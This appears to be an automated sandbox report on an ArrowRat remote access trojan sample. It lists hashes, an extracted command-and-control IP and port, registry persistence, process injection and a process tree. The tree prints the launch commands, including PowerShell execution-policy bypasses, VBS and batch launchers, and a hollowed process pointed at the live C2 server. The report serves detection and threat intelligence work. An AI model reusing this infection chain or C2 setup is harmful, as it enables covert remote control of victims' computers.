arrowrat | abf2dcd61f4a9717e372e32dcfcb02831e51130f4a91fa87bb7954785db435fd

Analysis

max time kernel
149s
max time network
154s
platform
windows10-2004_x64
resource
win10v2004-20230220-en
resource tags

arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
submitted
17-05-2023 18:29

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

222.ps1
Size

457KB
MD5

5ff1aded34d5d6f0635f6f9861436886
SHA1

d798ff38d279754353ee88ff35bf46a87dc75484
SHA256

abf2dcd61f4a9717e372e32dcfcb02831e51130f4a91fa87bb7954785db435fd
SHA512

b3d6b951c3130e8a834744cbebc78208b9e1393517ca40e4e3a5bdf391cb1c05c4a23ee88aaac61b1be5a163811069d97ecfdf372457607cc3716ea11a6d8402
SSDEEP

6144:6VDFV/A8nNKmbcRTUufYbE6N4tDeaBfLo1sHsl9yS/M0HixBNqrpB92bMDsA4nx2:snND98MDL

Score

10^/10

arrowrat client persistence rat

Malware Config

Extracted

Family

arrowrat

Botnet

Client

185.252.178.121:1337

Mutex

qCDAaGyIF

Signatures

ArrowRat
Remote access tool with various capabilities first seen in late 2021.
rat arrowrat

Modifies Installed Components in the registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Software\Microsoft\Active Setup\Installed Components	explorer.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Control Panel\International\Geo\Nation	WScript.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 2404 set thread context of 1684	2404	powershell.exe	91
PID 1684 set thread context of 2660	1684	aspnet_compiler.exe	93

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1013461898-3711306144-4198452673-1000\{87E2689E-2912-4625-B426-1D3CF6DF3F78}	explorer.exe

Suspicious behavior: EnumeratesProcesses 7 IoCs

pid	Process
1436	powershell.exe
1436	powershell.exe
2300	powershell.exe
2300	powershell.exe
2404	powershell.exe
2404	powershell.exe
1684	aspnet_compiler.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1436	powershell.exe
Token: SeDebugPrivilege	2300	powershell.exe
Token: SeIncreaseQuotaPrivilege	2300	powershell.exe
Token: SeSecurityPrivilege	2300	powershell.exe
Token: SeTakeOwnershipPrivilege	2300	powershell.exe
Token: SeLoadDriverPrivilege	2300	powershell.exe
Token: SeSystemProfilePrivilege	2300	powershell.exe
Token: SeSystemtimePrivilege	2300	powershell.exe
Token: SeProfSingleProcessPrivilege	2300	powershell.exe
Token: SeIncBasePriorityPrivilege	2300	powershell.exe
Token: SeCreatePagefilePrivilege	2300	powershell.exe
Token: SeBackupPrivilege	2300	powershell.exe
Token: SeRestorePrivilege	2300	powershell.exe
Token: SeShutdownPrivilege	2300	powershell.exe
Token: SeDebugPrivilege	2300	powershell.exe
Token: SeSystemEnvironmentPrivilege	2300	powershell.exe
Token: SeRemoteShutdownPrivilege	2300	powershell.exe
Token: SeUndockPrivilege	2300	powershell.exe
Token: SeManageVolumePrivilege	2300	powershell.exe
Token: 33	2300	powershell.exe
Token: 34	2300	powershell.exe
Token: 35	2300	powershell.exe
Token: 36	2300	powershell.exe
Token: SeIncreaseQuotaPrivilege	2300	powershell.exe
Token: SeSecurityPrivilege	2300	powershell.exe
Token: SeTakeOwnershipPrivilege	2300	powershell.exe
Token: SeLoadDriverPrivilege	2300	powershell.exe
Token: SeSystemProfilePrivilege	2300	powershell.exe
Token: SeSystemtimePrivilege	2300	powershell.exe
Token: SeProfSingleProcessPrivilege	2300	powershell.exe
Token: SeIncBasePriorityPrivilege	2300	powershell.exe
Token: SeCreatePagefilePrivilege	2300	powershell.exe
Token: SeBackupPrivilege	2300	powershell.exe
Token: SeRestorePrivilege	2300	powershell.exe
Token: SeShutdownPrivilege	2300	powershell.exe
Token: SeDebugPrivilege	2300	powershell.exe
Token: SeSystemEnvironmentPrivilege	2300	powershell.exe
Token: SeRemoteShutdownPrivilege	2300	powershell.exe
Token: SeUndockPrivilege	2300	powershell.exe
Token: SeManageVolumePrivilege	2300	powershell.exe
Token: 33	2300	powershell.exe
Token: 34	2300	powershell.exe
Token: 35	2300	powershell.exe
Token: 36	2300	powershell.exe
Token: SeIncreaseQuotaPrivilege	2300	powershell.exe
Token: SeSecurityPrivilege	2300	powershell.exe
Token: SeTakeOwnershipPrivilege	2300	powershell.exe
Token: SeLoadDriverPrivilege	2300	powershell.exe
Token: SeSystemProfilePrivilege	2300	powershell.exe
Token: SeSystemtimePrivilege	2300	powershell.exe
Token: SeProfSingleProcessPrivilege	2300	powershell.exe
Token: SeIncBasePriorityPrivilege	2300	powershell.exe
Token: SeCreatePagefilePrivilege	2300	powershell.exe
Token: SeBackupPrivilege	2300	powershell.exe
Token: SeRestorePrivilege	2300	powershell.exe
Token: SeShutdownPrivilege	2300	powershell.exe
Token: SeDebugPrivilege	2300	powershell.exe
Token: SeSystemEnvironmentPrivilege	2300	powershell.exe
Token: SeRemoteShutdownPrivilege	2300	powershell.exe
Token: SeUndockPrivilege	2300	powershell.exe
Token: SeManageVolumePrivilege	2300	powershell.exe
Token: 33	2300	powershell.exe
Token: 34	2300	powershell.exe
Token: 35	2300	powershell.exe

Suspicious use of WriteProcessMemory 28 IoCs

description	pid	Process	procid_target
PID 1436 wrote to memory of 4100	1436	powershell.exe	83
PID 1436 wrote to memory of 4100	1436	powershell.exe	83
PID 4100 wrote to memory of 4220	4100	WScript.exe	84
PID 4100 wrote to memory of 4220	4100	WScript.exe	84
PID 4220 wrote to memory of 2300	4220	cmd.exe	86
PID 4220 wrote to memory of 2300	4220	cmd.exe	86
PID 4472 wrote to memory of 4952	4472	WScript.exe	88
PID 4472 wrote to memory of 4952	4472	WScript.exe	88
PID 4952 wrote to memory of 2404	4952	cmd.exe	90
PID 4952 wrote to memory of 2404	4952	cmd.exe	90
PID 2404 wrote to memory of 1684	2404	powershell.exe	91
PID 2404 wrote to memory of 1684	2404	powershell.exe	91
PID 2404 wrote to memory of 1684	2404	powershell.exe	91
PID 2404 wrote to memory of 1684	2404	powershell.exe	91
PID 2404 wrote to memory of 1684	2404	powershell.exe	91
PID 2404 wrote to memory of 1684	2404	powershell.exe	91
PID 2404 wrote to memory of 1684	2404	powershell.exe	91
PID 2404 wrote to memory of 1684	2404	powershell.exe	91
PID 1684 wrote to memory of 3584	1684	aspnet_compiler.exe	92
PID 1684 wrote to memory of 3584	1684	aspnet_compiler.exe	92
PID 1684 wrote to memory of 2660	1684	aspnet_compiler.exe	93
PID 1684 wrote to memory of 2660	1684	aspnet_compiler.exe	93
PID 1684 wrote to memory of 2660	1684	aspnet_compiler.exe	93
PID 1684 wrote to memory of 2660	1684	aspnet_compiler.exe	93
PID 1684 wrote to memory of 2660	1684	aspnet_compiler.exe	93
PID 1684 wrote to memory of 2660	1684	aspnet_compiler.exe	93
PID 1684 wrote to memory of 2660	1684	aspnet_compiler.exe	93
PID 1684 wrote to memory of 2660	1684	aspnet_compiler.exe	93

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\222.ps1
1⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1436
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\ProgramData\Unlimited\ISO\Binnot.vbs"
  2⤵
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID:4100
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Unlimited\ISO\Binnot.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4220
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      PowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\Unlimited\ISO\Binnot.ps1
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2300

C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\ProgramData\Unlimited\ISO\Unlimited.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4472
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Unlimited\ISO\Unlimited.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4952
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    PowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\Unlimited\ISO\Unlimited.ps1
    3⤵
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:2404
  - - C:\Windows\Microsoft.NEt\Framework\v4.0.30319\aspnet_compiler.exe
      "C:\Windows\Microsoft.NEt\Framework\v4.0.30319\aspnet_compiler.exe"
      4⤵
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:1684
    - - C:\Windows\explorer.exe
        
        "C:\Windows\explorer.exe"
        5⤵
        Modifies Installed Components in the registry
        Modifies registry class
        
        PID:3584
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client 185.252.178.121 1337 qCDAaGyIF
        5⤵
        
        PID:2660

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
PID:1444

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Unlimited\ISO\Binnot.bat

Filesize
96B

MD5
f1d747a7825a5db756d428a5254d244e

SHA1
7db56fe57492bd856c787cd2a836eff4f2ce5e01

SHA256
5863b76caee43b2f1efdd2322f2e5731b1537d1deeb35e860cd75a8304fe4ddf

SHA512
4b1f63df96b8f9e2a381855974b2efab5bd48ae342b1e29a51661d0514ba6f8e62d23e3e58a9a9f978d39880ab03a9b9bf72ab52a546a965da20daa18c4d246d

Download Submit
C:\ProgramData\Unlimited\ISO\Binnot.ps1

Filesize
781B

MD5
58ef18971b1520648e0c6d67036251ff

SHA1
68bd1ee657ff233f6a1ee453914aaecdeb845284

SHA256
226b14799e579e28954937fa3ffdb7d0e5dcd10360b35c329a7246a23be4b4b3

SHA512
9b7f04aca4b3e2af5aafdc9ea30c1722722d668078bea8b0aaa2394d0cb50ac75716fb9173d4084bd5a9cfaa279bd94404b64c140532daa5b3bdd66842f332d2

Download Submit
C:\ProgramData\Unlimited\ISO\Binnot.vbs

Filesize
204B

MD5
8444901b66d6f83f3a684f1b44646868

SHA1
69c9c40aef3734959b4ce5f07005bf13c07646f9

SHA256
cfeaafc87ceec9986f37f6a42ecfa39260f98c951404df95da5e074141add5da

SHA512
7493b0d40c9c914c8968b42752b1d14d415e7bccff07f9bf2ab976d77517e12a456f142ee786527c4e536fab3e4156b21ce353f51f5925bbc405937ad7929bbb

Download Submit
C:\ProgramData\Unlimited\ISO\Unlimited.bat

Filesize
99B

MD5
eff64d56c40c54a1f9891d7a6ad54899

SHA1
dbaf9a4aeb8484690d6118155d59158598f0799a

SHA256
c846b192c5dc974c6d63024a06d4c31b2f7c8baa61af133e5b00009b68df86e2

SHA512
c89f82c7807b947e10f82740c01d5cb996e95c4a6e79375eee6b981d0ed911d31537e964d0cefef874c7e12f9f4baf237f0f9ed44de866abd3c8030a25b7cc83

Download Submit
C:\ProgramData\Unlimited\ISO\Unlimited.ps1

Filesize
455KB

MD5
e1bb0ce912e111d3b891de922e21a739

SHA1
8ae8856cb82f3340b2b2b1a06b3123b549005549

SHA256
5f79c8a3a6ff96ae8ccf96dfc486ae1f5e8edeabb663e6f90be89aeb727457cc

SHA512
bbb85cb9160a52d1bf464b7b459caaf9f808407031c423790be65e820fc8cce39c99c6096110228e8a8b33ddf5bff75350cbda2f6b01fc500f5169a4142528bf

Download Submit
C:\ProgramData\Unlimited\ISO\Unlimited.vbs

Filesize
207B

MD5
c281573a4f6f6ac5b06f2e9436400093

SHA1
c2699e56b7c26ac9cdfe1f500b49151b69bd6ad8

SHA256
3c312f2547fbc4a3ffe5c1b6d91c03494d7653fd758d886473f2ae6656de11f7

SHA512
76aed1be4b48d2fc019c9136eb74b3a96b56b89c74cb3b3347f8eefc592fee24a2a94ea3babd4b394080c7663864781c89afe761e59f8d65aed147d1ed422026

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
223bd4ae02766ddc32e6145fd1a29301

SHA1
900cfd6526d7e33fb4039a1cc2790ea049bc2c5b

SHA256
1022ec2fed08ff473817fc53893e192a8e33e6a16f3d2c8cb6fd37f49c938e1e

SHA512
648cd3f8a89a18128d2b1bf960835e087a74cdbc783dbfcc712b3cb9e3a2e4f715e534ba2ef81d89af8f60d4882f6859373248c875ceb26ad0922e891f2e74cc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
3003448ee73abf14d5c8011a37c40600

SHA1
b88e9cdbae2e27a25f0858fc0b6d79533fb160d8

SHA256
ae448d99735879ecee1dc3088c8f7553ebff461b96172d8f3cb5ff2fa2a12d4a

SHA512
0fe52614eec6d75a265ae380aaa1eb153bc35a1baae4d118637798575169d9dba5ad751efab5d7f5dbe9764bfb96e9ae76577a3487429a3383b5b08d5402fe3a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
0c77ce1db08e7f1b2bc9896a13b4f7a5

SHA1
3de7b852f908b16834f9484bce8eebd4d7389ec1

SHA256
dcb3cb7065cee59e6f4e62405ef4c5418a04a35a1ac04db0b846851bc7ec967f

SHA512
5244fa2ce993c07dfbbeac86360c2e49e86c0957a016624251e917223b0d1c0afd5fefdf17b397b298c194b5699c8696dd7e59f379d6eae98665be361f077b29

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_eeamc5sh.ab5.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/1436-138-0x0000029038170000-0x0000029038192000-memory.dmp

Filesize
136KB

Download
memory/1436-145-0x00000290366E0000-0x00000290366F0000-memory.dmp

Filesize
64KB

Download
memory/1436-144-0x00000290366E0000-0x00000290366F0000-memory.dmp

Filesize
64KB

Download
memory/1436-143-0x00000290366E0000-0x00000290366F0000-memory.dmp

Filesize
64KB

Download
memory/1684-193-0x00000000059E0000-0x0000000005F84000-memory.dmp

Filesize
5.6MB

Download
memory/1684-191-0x0000000000400000-0x000000000042C000-memory.dmp

Filesize
176KB

Download
memory/1684-194-0x0000000005510000-0x00000000055AC000-memory.dmp

Filesize
624KB

Download
memory/2300-173-0x000001D058610000-0x000001D058620000-memory.dmp

Filesize
64KB

Download
memory/2300-161-0x000001D058610000-0x000001D058620000-memory.dmp

Filesize
64KB

Download
memory/2300-160-0x000001D058610000-0x000001D058620000-memory.dmp

Filesize
64KB

Download
memory/2404-189-0x0000022D7F170000-0x0000022D7F180000-memory.dmp

Filesize
64KB

Download
memory/2404-190-0x0000022D7F170000-0x0000022D7F180000-memory.dmp

Filesize
64KB

Download
memory/2404-188-0x0000022D7F170000-0x0000022D7F180000-memory.dmp

Filesize
64KB

Download
memory/2660-195-0x0000000000400000-0x0000000000418000-memory.dmp

Filesize
96KB

Download
memory/2660-197-0x00000000053D0000-0x0000000005462000-memory.dmp

Filesize
584KB

Download
memory/2660-198-0x00000000056A0000-0x00000000056B0000-memory.dmp

Filesize
64KB

Download
memory/2660-199-0x0000000005BB0000-0x0000000005C16000-memory.dmp

Filesize
408KB

Download